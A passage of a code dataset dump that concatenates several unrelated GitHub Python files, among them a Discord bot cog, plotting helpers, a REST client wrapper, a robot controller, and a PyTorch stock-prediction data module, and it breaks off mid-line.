ctx.reply(embed=embed)\n\n\n # !sauce (url) - search for sauce\n @commands.command(usage=\"(url)\", description=\"Search for sauce (You can also get the sauce by uploading an image or replying to a message)\")\n async def sauce(self, ctx, url = None):\n # If an URL is passed\n if url:\n await self.search_sauce(ctx, url)\n # No URL\n else:\n # If user wanna find out the source of an image from their pc\n if ctx.message.attachments:\n await self.search_sauce(ctx, ctx.message.attachments[0].url)\n # await ctx.reply(ctx.message.attachments[0].url)\n # If user wanna find out the source from a reply\n elif ctx.message.reference:\n # Original message\n message = await ctx.fetch_message(ctx.message.reference.message_id)\n\n # Image uploaded by an user\n if message.attachments:\n await self.search_sauce(ctx, message.attachments[0].url)\n # await ctx.reply(message.attachments[0].url)\n # Preview image from an URL\n elif message.embeds:\n # Embed with an image\n if message.embeds[0].image.url:\n await self.search_sauce(ctx, message.embeds[0].image.url)\n # await ctx.reply(message.embeds[0].image.url)\n # Embed with a thumbnail image\n elif message.embeds[0].thumbnail.url:\n await self.search_sauce(ctx, message.embeds[0].thumbnail.url)\n # await ctx.reply(message.embeds[0].thumbnail.url)\n # Embed with no image\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Reply to a message that contains an image!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n # No image\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Reply to a message that contains an image!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n # When user types only \"!sauce\"\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**There is nothing to search for!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # Checking if arguments are valid\n @sauce.error\n async def sauce_error(self, ctx, error):\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**{}**\".format(error)\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # !junior - display junior's pic\n @commands.command(description=\"Junior zuado\")\n async def teste(self, ctx):\n embed = discord.Embed(\n color = discord.Color.gold(),\n timestamp = datetime.utcnow()\n )\n\n embed.set_image(url='https://gekinetu.com/wp-content/uploads/2021/07/img_1625613824-300x150.png')\n embed.set_thumbnail(url='https://static.wikia.nocookie.net/rezero/images/c/cc/Emilia_-_Re_Zero_Anime_BD_-_13.png/revision/latest/scale-to-width-down/1000?cb=20160915153714')\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n message = await ctx.reply(embed=embed)\n\n\ndef setup(client):\n client.add_cog(Outros(client))","repo_name":"leandro1st/discord-megumin-bot","sub_path":"cogs/outros.py","file_name":"outros.py","file_ext":"py","file_size_in_byte":18074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"15590005291","text":"'''\nMain admin window.\n@author: Nikita Ofitserov\n'''\n\nfrom PyQt4 import QtGui\n\nfrom twisted.internet import reactor\n\nfrom consys.admin import login, hwview\nfrom consys.admin.main_ui import Ui_MainWindow\n\nclass MainWindow(QtGui.QMainWindow):\n\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.hwmodel = hwview.HardwareModel()\n hwview.connect_model(self.hwmodel)\n self.ui.terminalsView.setModel(self.hwmodel)\n\n def closeEvent(self, *args, **kwargs):\n reactor.stop()\n\ndef on_login():\n global _window\n _window = MainWindow()\n _window.show()\n\nlogin.successful.connect(on_login)\n","repo_name":"neerc-linux/ConSys","sub_path":"consys/admin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3143254248","text":"import os\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport seaborn as sns\n\ndef clean_directory(directory: str):\n \"\"\"\n Removes files in the experiment dir\n :param directory: experiment dir\n \"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n for the_file in os.listdir(directory):\n file_path = os.path.join(directory, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n return\n\n\ndef save_scatter_plot(name: str, experiment_path: str, array_x: list, array_y: list):\n\n lim = max(array_x + array_y)\n\n plt.title(name)\n plt.xlim(0, lim)\n plt.ylim(0, lim)\n plt.plot(array_x, array_y, 'ro', markersize=1)\n plt.grid(True)\n plt.gca().set_aspect('equal', adjustable='box')\n plt.savefig(experiment_path)\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_scatter_plot2(name: str, experiment_dir: str, array1_x: list, array1_y: list, array2_x: list, array2_y: list):\n plt.title(name)\n plt.plot(array1_x, array1_y, 'ro')\n plt.plot(array2_x, array2_y, 'go')\n plt.grid(True)\n plt.gca().set_aspect('equal')\n plt.savefig(experiment_dir + name + '.png')\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_hist(name: str, experiment_path: str, array: list):\n plt.title(name)\n plt.hist(array, 50, normed=False, facecolor='green')\n plt.grid(True)\n plt.savefig(experiment_path)\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_rmse_hist(name: str, experiment_path: str, array1: list, array2: list):\n all_errors = []\n for i in range(0, len(array1)):\n rmse = np.math.sqrt((array1[i] - array2[i]) ** 2)\n all_errors.append(rmse)\n plt.title(name)\n plt.ylim(0, 0.05)\n n, b, p = plt.hist(all_errors, 50, normed=True, facecolor='green')\n plt.grid(True)\n plt.savefig(experiment_path)\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_3d_plot_dep(name: str, path: str, points):\n xs = np.array(points[:, 0])\n ys = np.array(points[:, 1])\n zs = np.array(points[:, 2])\n plt.title(name)\n fig = plt.figure(figsize=(40, 40))\n ax = fig.gca(projection='3d')\n ax.plot(xs, ys, zs)\n plt.savefig(path)\n plt.close(\"all\")\n plt.clf()\n return\n\n\ndef save_obj(name: str, path: str, points):\n scale = 10\n file = open(path, 'w')\n for point in points:\n file.write('v {} {} {}'.format(point[0] * scale, point[1] * scale, point[2] * scale))\n file.write('\\n')\n file.write('cstype cardinal\\n')\n file.write('deg 3\\n')\n file.write('curv 0.000000 3.000000 ')\n for i in range(1, points.shape[0]):\n file.write('{} '.format(str(i)))\n file.write('\\n')\n file.write('parm u 0.000000 1.000000 2.000000 3.000000\\n')\n file.write('end\\n')\n file.close()\n return\n\n\ndef save_xyz(name: str, path: str, points):\n scale = 10\n file = open(path, 'w')\n file.write(str(points.shape[0]))\n file.write('\\n')\n file.write(name)\n file.write('\\n')\n for point in points:\n file.write('H {} {} {}'.format(point[0] * scale, point[1] * scale, point[2] * scale))\n file.write('\\n')\n file.close()\n return\n\n\ndef save_3d_plot(name: str, path: str, points):\n xs = np.array(points[:, 0])\n ys = np.array(points[:, 1])\n zs = np.array(points[:, 2])\n plt.title(name)\n fig = plt.figure(figsize=(40, 40))\n ax = fig.add_subplot(111, projection='3d')\n\n # Get rid of the panes\n ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n ax.w_zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))\n\n # Get rid of the spines\n ax.w_xaxis.line.set_color((1.0, 1.0, 1.0, 0.0))\n ax.w_yaxis.line.set_color((1.0, 1.0, 1.0, 0.0))\n ax.w_zaxis.line.set_color((1.0, 1.0, 1.0, 0.0))\n\n # Get rid of the ticks\n # ax.set_xticks([])\n # ax.set_yticks([])\n # ax.set_zticks([])\n\n ax.xaxis.set_ticklabels([])\n ax.yaxis.set_ticklabels([])\n ax.zaxis.set_ticklabels([])\n\n ax.set_axis_bgcolor((1, 1, 1))\n\n line = ax.plot(xs, ys, zs)\n plt.setp(line, linewidth=8)\n\n plt.savefig(path)\n plt.close(\"all\")\n plt.clf()\n return\n\ndef save_adjastency_matrix(name: str, path: str, data):\n plt.title(name)\n fig = plt.figure(figsize=(80, 80))\n f, ax = plt.subplots(figsize=(11, 9))\n colors = [\"blue\", \"yellow\", \"red\"]\n cmap = sns.blend_palette(colors, as_cmap=True)\n sns.heatmap(data, cmap=cmap, square=True, xticklabels=100, yticklabels=100)\n plt.savefig(path)\n plt.close(\"all\")\n plt.clf()\n return\n","repo_name":"skkap/mdsga","sub_path":"src/helpers/files_helper.py","file_name":"files_helper.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"33167417738","text":"import json\nimport logging\nfrom enum import Enum\n\nimport requests\nfrom requests import Response\n\n\nclass HTTPMethods(Enum):\n GET = 'get'\n POST = 'post'\n PUT = 'put'\n DELETE = 'delete'\n PATCH = 'patch'\n HEAD = 'head'\n OPTIONS = 'options'\n\n\nclass Environnement(Enum):\n PROD = 'prod'\n DEV = 'dev'\n TEST = 'test'\n\n\nclass ClientApp:\n\n def __init__(self,\n client_id: str = '',\n client_secret: str = '',\n environnement: Environnement = Environnement.DEV,\n ):\n self.client_id = str(client_id)\n self.client_secret = str(client_secret)\n if str(environnement).upper() in ['PRD', 'PROD', 'PRODUCTION']:\n self.environnement = Environnement.PROD\n elif str(environnement).upper() in ['DEV', 'HOM', 'UAT', 'DEVELOPMENT']:\n self.environnement = Environnement.DEV\n else:\n self.environnement = str(environnement).upper()\n\n\nclass ServiceManager:\n\n def __init__(self,\n client_app,\n api_name=\"\",\n logger_name=\"\",\n return_raw_response=False):\n \"\"\"\n :type client_app: ClientApp\n :param client_app: your client app information\n :param api_name: name of the API Service calling the service_manager: Used for Init logs purposes\n :param logger_name: name of the logger to use for logs\n :param return_raw_response: if True, returns the API response as is, else returns a Box object\n \"\"\"\n\n self.client_app = client_app\n self.api_name = api_name\n self.logger_name = logger_name\n self.return_raw_response = return_raw_response\n self.accepted_responses = list(range(200, 207))\n\n self.session = requests.Session()\n self.logger = self.get_logger()\n\n if self.logger:\n self.get_service_info()\n else:\n print(self.get_service_info())\n\n def get_logger(self):\n if self.logger_name:\n return logging.getLogger(self.logger_name)\n else:\n for name in logging.root.manager.loggerDict:\n if name.startswith(self.api_name):\n return logging.getLogger(name)\n return None\n\n def get_service_info(self):\n if self.logger:\n self.logger.info(f\"ServiceManager for {self.api_name} initialized\")\n else:\n return f\"ServiceManager for {self.api_name} initialized\"\n\n def get(self, uri_request, params='', timeout=60, verify=True):\n\n return self._test_response(\n self.session.get(url=uri_request, params=params, timeout=timeout, verify=verify), request_params=params)\n\n def post(self, uri_request, data='', json='', timeout=60, verify=True):\n data = self._dump_data(data)\n return self._test_response(\n self.session.post(url=uri_request, data=data, json=json, timeout=timeout, verify=verify),\n request_data=data,\n request_json=json)\n\n def patch(self, uri_request, data='', json='', timeout=60, verify=True):\n data = self._dump_data(data)\n return self._test_response(\n self.session.patch(url=uri_request, data=data, json=json, timeout=timeout, verify=verify),\n request_data=data,\n request_json=json)\n\n def put(self, uri_request, data='', json='', timeout=60, verify=True):\n data = self._dump_data(data)\n return self._test_response(\n self.session.put(url=uri_request, data=data, json=json, timeout=timeout, verify=verify),\n request_data=data,\n request_json=json)\n\n def delete(self, uri_request, timeout=60, verify=True):\n return self._test_response(\n self.session.delete(url=uri_request, json=json, timeout=timeout, verify=verify)\n )\n\n @staticmethod\n def _dump_data(data):\n if data:\n return json.dumps(data)\n return data\n\n def _test_response(self, response: Response, request_params: str = '', request_data: str = '', request_json=''):\n if not self.return_raw_response and response.status_code in self.accepted_responses:\n try:\n return response.json()\n except Exception as e:\n return print(f\"{response.text} - {e}\")\n\n if self.logger:\n log_string = f'Error on {response.request.method} method for this request: {response.request.url}\\n' \\\n f\"Status code: {response.status_code} - Reason: {response.reason} - Text: {response.text}\"\n\n if request_params != '' and request_params is not None:\n log_string += f\"\\nRequest params: {request_params}\"\n if request_data != '' and request_data is not None:\n log_string += f\"\\nRequest data: {request_data}\"\n if request_json != '' and request_json is not None:\n log_string += f\"\\nReturn json: {request_json}\"\n self.logger.error(log_string, exc_info=False)\n\n if response.status_code not in self.accepted_responses:\n return response.raise_for_status()\n return response\n","repo_name":"garciahyacinthe/Investment_Shared","sub_path":"api_manager/rest_service_manager.py","file_name":"rest_service_manager.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70204669768","text":"from copy import deepcopy\nimport random\n\ndef build_speaker_dict(scene, all_names, male_names, female_names):\n scene_speakers = set()\n # Collect Speaker Names\n for line in scene:\n if len(line)==13:\n scene_speakers.add(line[8].lower())\n elif len(line)>13:\n scene_speakers.add(line[9].lower())\n # all_speakers.add(\" \".join([token.lower() for token in line[9:len(line)-4]]))\n # Build Speaker Dict\n speaker_dict = {}\n male_subset = deepcopy(all_names['male_names'][:100])\n female_subset = deepcopy(all_names['female_names'][:100])\n # print(male_subset)\n # print(female_subset)\n for speaker in scene_speakers:\n if speaker in male_names:\n mapped_name = random.sample(male_subset, 1)[0]\n male_subset.remove(mapped_name)\n speaker_dict[speaker] = mapped_name.capitalize()\n elif speaker in female_names:\n # print(\"Female:\", speaker)\n mapped_name = random.sample(female_subset, 1)[0]\n female_subset.remove(mapped_name)\n speaker_dict[speaker] = mapped_name.capitalize()\n return speaker_dict\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"boyuanzheng010/mmc","sub_path":"data_creation/prepare_exp_data/utils/convert_speaker_names.py","file_name":"convert_speaker_names.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"17063329149","text":"#coding: utf-8\n\nimport tushare as ts\n\ndef k_chart_data(code):\n \"\"\"\n 根据code获取K线图数据\n Args:\n code:股票代码\n Returns:\n [] 股票收盘价数据\n \"\"\"\n _data = ts.get_hist_data(code)\n r = _data.sort_index().close\n return [\n (x,r[x]) for x in r.index\n ]\n\ndef info(code):\n \"\"\"\n 根据code获取基本信息\n Args:\n code:股票代码\n Returns:\n {}\n \"\"\"\n _data = ts.get_stock_basics()\n _item = dict(_data.loc[code])\n return _item\n\ndef border(code, day=None):\n \"\"\"\n 根据code价格区间,最大值以及最小值\n Args:\n code:股票代码\n Returns:\n () 第一个参数最小值,第二个参数最大值\n \"\"\"\n _d = ts.get_hist_data(code)\n _c = None\n if day is not None:\n _c = _d.close[-day:]\n else:\n _c = _d.close\n return (round(_c.min(), 2), round(_c.max(), 2))\n","repo_name":"trainking/venus","sub_path":"data/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38665401138","text":"import pandas as pd\n\nimport os.path as path\nfrom subprocess import call\nfrom sklearn.metrics import mean_squared_error\n\ndata_dir = '/home/lz1008/Homework/GD/PyProject/data/ml-20m/'\n\n\ndef prepare_csv():\n movie = pd.read_csv(path.join(data_dir, 'movie.csv'))\n movie['movieId'] = movie['movieId'].astype(int)\n genre_names = [\"Action\", \"Adventure\", \"Animation\", \"Children\", \"Comedy\", \"Crime\",\n \"Documentary\", \"Drama\", \"Fantasy\", \"Film-Noir\", \"Horror\", \"Musical\",\n \"Mystery\", \"Romance\", \"Sci-Fi\", \"Thriller\", \"War\", \"Western\", \"IMAX\"]\n genres_map = {}\n for tp in movie.itertuples():\n genres_map[tp[1]] = tp[3]\n\n rating = pd.read_csv(path.join(data_dir, 'rating.csv'))\n rating['movieId'] = rating['movieId'].astype(int)\n\n output = open(path.join(data_dir, 'rating_g.csv'), 'w')\n output.write(','.join([\"rating\", \"userId\", \"movieId\"] + genre_names) + '\\n')\n for tp in rating.itertuples():\n genres = genres_map[tp[2]].split('|')\n onehot = [genre in genres and '1' or '' for genre in genre_names]\n output.write('{},{},{},{}\\n'.format(tp[3], tp[1], tp[2], ','.join(onehot)))\n\n\ndef convert_csv():\n call(['./cmake-build-release/src/utility/csv2ffm',\n path.join(data_dir, 'rating_g.csv'),\n path.join(data_dir, 'rating_g.ffm'),\n '--header',\n '--per-column',\n '--encode', 'c2n19',\n '--group', '1;2;3-21',\n ])\n\n\ndef train():\n cmd_args = ['./cmake-build-release/src/zlearn',\n '--threads', '4',\n '--regression',\n 'train', 'FM',\n '--opt', 'sgd',\n '--metric', 'rmsd',\n '-n', '100',\n '--window', '5',\n '-k', '4',\n '-r', '0.002',\n '--lr', '0.00002',\n '--input', path.join(data_dir, 'rating_g.ffm'),\n '--split', '4:1',\n '--dump-train', path.join(data_dir, 'train.ffm'),\n '--dump-test', path.join(data_dir, 'test.ffm'),\n ]\n print(' '.join(cmd_args))\n # call(cmd_args)\n\n\ndef predict():\n cmd_args = ['./cmake-build-release/src/zlearn',\n 'predict',\n '--model', path.join(data_dir, 'rating_g.ffm.bin'),\n '--input', path.join(data_dir, 'test.ffm'),\n '--output', path.join(data_dir, 'test.out'),\n ]\n call(cmd_args)\n\n\ndef measure():\n predicted = open(path.join(data_dir, 'test.out'))\n truth = open(path.join(data_dir, 'test.ffm'))\n P = []\n T = []\n i = 0\n while True:\n p = predicted.readline()\n t = truth.readline()\n i += 1\n if len(p) == 0:\n break\n assert len(t) != 0\n t = t.split(' ')[0]\n P.append(float(p[:-1]))\n T.append(float(t))\n print(mean_squared_error(T, P))\n\n\nif __name__ == '__main__':\n # prepare_csv()\n # convert_csv()\n train()\n # predict()\n # measure()\n","repo_name":"billuo/zlearn","sub_path":"scripts/run_ml-20m.py","file_name":"run_ml-20m.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32189715724","text":"\"\"\" \nMain file \n\nOppgave:\n Jage en farget gjenstand uten å kollidere med andre hindringer eller\n kjøre ut av banen.\n Kamera: Leter etter gitt farge\n IR: Passer på kantene\n Ultralyd: Unngår kollisjon med andre gjenstander\n Alternativt: beskytte reviret sitt fra statistikkhefter\n\nBehaviors:\n Idle: Tilfeldig hastighet, leter etter mål\n EdgeDetection: Kant\n Stop: Knappetrykk eller mål utført\n (RemoteControl: Fjernstyring fra kommandolinje)\n\nSensobs:\n EdgeFinder\n ColorFinder\n\"\"\"\n\nfrom RPi import GPIO\nfrom project6_zumo.bbcon import BBCON\nfrom project6_zumo.arbitrator import Arbitrator\nfrom project6_zumo.motob import Motob\nfrom project6_zumo.behaviors import RemoteControl, EdgeDetection, Idle, Anti_crash, ColorChasing\nfrom project6_supply.sensors.zumo_button import ZumoButton\nfrom project6_supply.motors import Motors\nfrom project6_zumo.sensobs import Collition, ColorFinder\nimport wiringpi as wp\n\nimport sys\n\n\ndef main():\n wp.wiringPiSetupGpio()\n m = Motors()\n m.forward(0.2, 0.2)\n\n btn = ZumoButton()\n btn.wait_for_press()\n a = Arbitrator()\n controller = BBCON(a)\n print(\"Created controller\")\n collition_detector = Collition()\n color_finder = ColorFinder()\n print(\"Created common sensobs\")\n # controller.add_behavior(RemoteControl(10))\n controller.add_behavior(EdgeDetection(100))\n controller.add_behavior(Anti_crash(10, sensors=[collition_detector]))\n controller.add_behavior(Idle(1))\n controller.add_behavior(ColorChasing(\n 15, sensors=[color_finder, collition_detector]))\n controller.activate_behavior(controller.behaviors[0])\n controller.activate_behavior(controller.behaviors[1])\n controller.activate_behavior(controller.behaviors[2])\n controller.activate_behavior(controller.behaviors[3])\n print(\"Added behaviors:\")\n for c in a.behaviors:\n print(c)\n controller.motobs = [Motob(None)]\n print(\"Added motob\")\n print(\"Running loop\")\n while 1:\n controller.run_one_timestep()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n finally:\n GPIO.cleanup()\n","repo_name":"Riphiphip/Plab-Group-Behavior-Based-Robot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26577113927","text":"import math\nimport os\nimport gc\nimport json\nfrom tqdm import tqdm\n\nimport pandas as pd\nimport numpy as np\n\nimport torch\nimport torch.nn.functional as F\n\nimport pytorch_lightning as pl\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom utils import torch_nanmean, torch_nanstd, torch_nansum, torch_nanmax, torch_nanmin, transform_num_days\nfrom utils import impute, impute_with_medians, extend, from_date_to_int\n\nimport warnings\nfrom pandas.core.common import SettingWithCopyWarning\nwarnings.simplefilter(action=\"ignore\", category=SettingWithCopyWarning)\n\nnp.set_printoptions(threshold=2000, linewidth=140, precision=5, edgeitems=20, suppress=1)\npd.set_option('display.max_rows', 600)\n\n\n\nclass JPXdataModule(pl.LightningDataModule):\n\n def __init__(self, mode=None, fold='EVAL', secondary_data=False, settings=None):\n\n super(JPXdataModule, self).__init__()\n\n self.mode = mode\n self.fold = fold\n\n print('loading settings...')\n if settings is None:\n with open('./settings.json') as f:\n self.settings = json.load(f)\n else:\n self.settings = settings\n\n self.create_channel_files(secondary=secondary_data)\n torch.cuda.empty_cache()\n gc.collect()\n\n if mode is None:\n return\n\n if mode == 'inference':\n\n self.sto = torch.load(self.settings['CACHE_DIR'] + 'data_stocks.pt')\n self.last_date = np.max(np.unique(self.sto[:,:,0].flatten().detach().numpy())[:-1])\n self.unique_secus = np.unique(self.sto[:,:,1].flatten().detach().numpy())[:-1]\n self.sto = self.sto[-1].unsqueeze(0).cuda()\n\n self.pri = torch.load(self.settings['CACHE_DIR'] + 'last_prices.pt').cuda()\n self.upd = torch.load(self.settings['CACHE_DIR'] + 'last_updates.pt')[-1].unsqueeze(0).cuda()\n\n self.prepro_means_por = torch.load(self.settings['CACHE_DIR'] + 'prepro_means_por_{}.pt'.format(fold)).cuda()\n self.prepro_means_ret = torch.load(self.settings['CACHE_DIR'] + 'prepro_means_ret_{}.pt'.format(fold)).cuda()\n self.prepro_means_vol = torch.load(self.settings['CACHE_DIR'] + 'prepro_means_vol_{}.pt'.format(fold)).cuda()\n\n self.prepro_stds_por = torch.load(self.settings['CACHE_DIR'] + 'prepro_stds_por_{}.pt'.format(fold)).cuda()\n self.prepro_stds_ret = torch.load(self.settings['CACHE_DIR'] + 'prepro_stds_ret_{}.pt'.format(fold)).cuda()\n self.prepro_stds_vol = torch.load(self.settings['CACHE_DIR'] + 'prepro_stds_vol_{}.pt'.format(fold)).cuda()\n\n else:\n\n sto = torch.load(self.settings['CACHE_DIR'] + 'data_stocks.pt').cuda()\n tar = torch.load(self.settings['CACHE_DIR'] + 'data_targets.pt').cuda()\n\n is_active = sto[:,:,-1]\n\n if fold == 'EVAL':\n\n lenght = len(sto)\n block_size = 126\n\n is_train = np.ones(lenght)\n is_train[:(lenght % block_size)] = 0\n is_train[-block_size:] = 0\n is_train = is_train==1\n\n is_valid = np.zeros(lenght)\n is_valid[-block_size:] = 1\n is_valid = is_valid==1\n\n elif fold.startswith('CV'):\n\n jump = int(fold[-2])\n shift = int(fold[-1])\n\n is_train = (np.arange(len(tar)) + shift) % jump != 0\n is_valid = ~is_train\n\n else:\n\n raise Exception('Unknown split method')\n\n if mode == 'returns_classification':\n\n self.batch_size = 3\n\n ret = torch.load(self.settings['CACHE_DIR'] + 'data_returns.pt').cuda()\n volatility = torch.load(self.settings['CACHE_DIR'] + 'data_volatility.pt').cuda()[:,:,3]\n\n self.x = torch.cat(self.pre_process(ret, sto, is_train, 'ret'), dim=-1)\n self.y = tar[:,:,0]\n self.w = is_active * torch.clip(0.025 - torch.abs(volatility - 0.025), 0)\n\n elif mode == 'volatility_classification':\n\n self.batch_size = 3\n\n vol = torch.load(self.settings['CACHE_DIR'] + 'data_volatility.pt').cuda()\n self.x = torch.cat(self.pre_process(vol, sto, is_train, 'vol'), dim=-1)\n self.y = tar[:,:,1]\n self.w = is_active\n\n elif mode == 'portfolio_optimization':\n\n self.batch_size = 126\n\n fin = torch.load(self.settings['CACHE_DIR'] + 'data_finances.pt').cuda()\n ret = torch.load(self.settings['CACHE_DIR'] + 'data_returns.pt').cuda()\n vol = torch.load(self.settings['CACHE_DIR'] + 'data_volatility.pt').cuda()\n ret_probs = torch.load(self.settings['CACHE_DIR'] + 'pred_returns_classification_{}.pt'.format(fold)).cuda().unsqueeze(-1)\n vol_probs = torch.load(self.settings['CACHE_DIR'] + 'pred_volatility_classification_{}.pt'.format(fold)).cuda().unsqueeze(-1)\n\n # fin tensor features:\n # quaterly_diff, annual_diff, forecasts_diff, forecasts_ann, eq_to_asset, \n # days_since_last_update, days_since_last_annual_update, days_since_last_forecast, \n # profit_type, market_cap, is_year_update, is_forecast, update_types\n\n fin[:,:,-8:-5] = transform_num_days(fin[:,:,-8:-5]) # days_since_last_update\n fin[:,:,-4] = 1. *(fin[:,:,-4] < 8e9) # is_illiquid\n\n fin = torch.cat(( ret[:,:,:8], \n vol[:,:,:8], \n fin),\n dim=-1)\n\n feats, feats_common = self.pre_process(fin[:,:,:-5], sto, is_train, 'por')\n\n update_types = F.one_hot(fin[:,:,-1].long())\n profit_types = F.one_hot(fin[:,:,-5].long())\n binary_feats = fin[:,:,-4:-1]\n\n vol_weights = - torch.clip(vol[:,:,3],0,0.05).unsqueeze(-1)\n\n self.x = torch.cat(( ret_probs - 0.5, 0.5 - vol_probs, vol_weights,\n feats, profit_types, binary_feats, update_types, feats_common), dim=-1)\n self.y = tar[:,:,0]\n self.w = is_active\n\n else:\n\n raise Exception('Unknown training_mode')\n\n self.x = self.x.detach().cpu().numpy()\n self.y = self.y.detach().cpu().numpy()\n\n gc.collect()\n torch.cuda.empty_cache()\n\n print('train len:',len(self.x[is_train]))\n print('val len:',len(self.x[~is_train]))\n\n self.train_ds = JpxDataSet(self.x[is_train], self.y[is_train], self.w[is_train])\n self.val_ds = JpxDataSet(self.x[is_valid], self.y[is_valid], self.w[is_valid])\n self.all_ds = JpxDataSet(self.x, self.y, self.w)\n\n def pre_process(self, feats, sto, is_train, cache_label):\n\n feats = torch.clip(feats, -5000, 5000)\n\n feats = torch.nan_to_num(feats)\n sto = torch.nan_to_num(sto)\n\n day_means = torch.mean(feats, dim=1).unsqueeze(1)\n day_means = torch.repeat_interleave(day_means, feats.shape[1], dim=1)\n feats = torch.cat((feats - day_means, day_means), dim=-1)\n\n stds, means = torch.std_mean(feats[is_train], dim=(0,1))\n feats = (feats - means) / (stds + 1e-6)\n\n torch.save(means.detach().cpu(), self.settings['CACHE_DIR'] + 'prepro_means_{}_{}.pt'.format(cache_label,self.fold))\n torch.save(stds.detach().cpu(), self.settings['CACHE_DIR'] + 'prepro_stds_{}_{}.pt'.format(cache_label,self.fold))\n\n exchange_segment_id = F.one_hot(sto[:,:,3].long() - 1)\n sector_id = F.one_hot(sto[:,:,4].long() - 1)\n index_id = F.one_hot(sto[:,:,5].long())\n\n sto = torch.cat(( exchange_segment_id,\n sector_id,\n index_id,\n sto[:,:,-3:]\n ), dim=-1)\n\n return feats, sto\n\n def pre_process_for_inference_feat(self, feats, cache_label):\n\n feats = torch.clip(feats, -5000, 5000)\n feats = torch.nan_to_num(feats)\n\n day_means = torch.mean(feats, dim=1).unsqueeze(1)\n day_means = torch.repeat_interleave(day_means, feats.shape[1], dim=1)\n feats = torch.cat((feats - day_means, day_means), dim=-1)\n\n if cache_label == 'ret':\n feats = (feats - self.prepro_means_ret) / (self.prepro_stds_ret + 1e-6)\n elif cache_label == 'vol':\n feats = (feats - self.prepro_means_vol) / (self.prepro_stds_vol + 1e-6)\n elif cache_label == 'por':\n feats = (feats - self.prepro_means_por) / (self.prepro_stds_por + 1e-6)\n else:\n raise Exception()\n\n return feats\n\n def pre_process_for_inference_sto(self, sto):\n\n sto = torch.nan_to_num(sto)\n\n exchange_segment_id = F.one_hot(sto[:,:,3].long() - 1, num_classes=3)\n sector_id = F.one_hot(sto[:,:,4].long() - 1, num_classes=17)\n index_id = F.one_hot(sto[:,:,5].long(), num_classes=8)\n\n sto = torch.cat(( exchange_segment_id,\n sector_id,\n index_id,\n sto[:,:,-3:]\n ), dim=-1)\n\n return sto\n\n def process_day_for_inference(self, prices_csv, financials_csv):\n\n prices_csv = prices_csv[[ 'Date', 'SecuritiesCode', 'Open', 'High', 'Low', 'Close', 'Volume', \n 'AdjustmentFactor', 'ExpectedDividend', 'SupervisionFlag']]\n\n prices_csv.Date = from_date_to_int(prices_csv.Date)\n prices_csv = prices_csv.to_numpy(np.float32)\n\n # series tensor dims: time, security, channel\n new_date = prices_csv[-1,0].item()\n\n # this is just for kaggle public LB which uses old validatin data\n if new_date <= self.last_date:\n self.last_date = new_date - 1\n\n d0 = int(new_date - self.last_date)\n d1 = len(self.unique_secus)\n\n self.last_date = new_date\n\n ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n\n self.sto[:,:,0] = new_date\n self.sto[:,:,-3:] = 0 # expected_dividend, under_supervision, is_active\n\n tensor_pri = 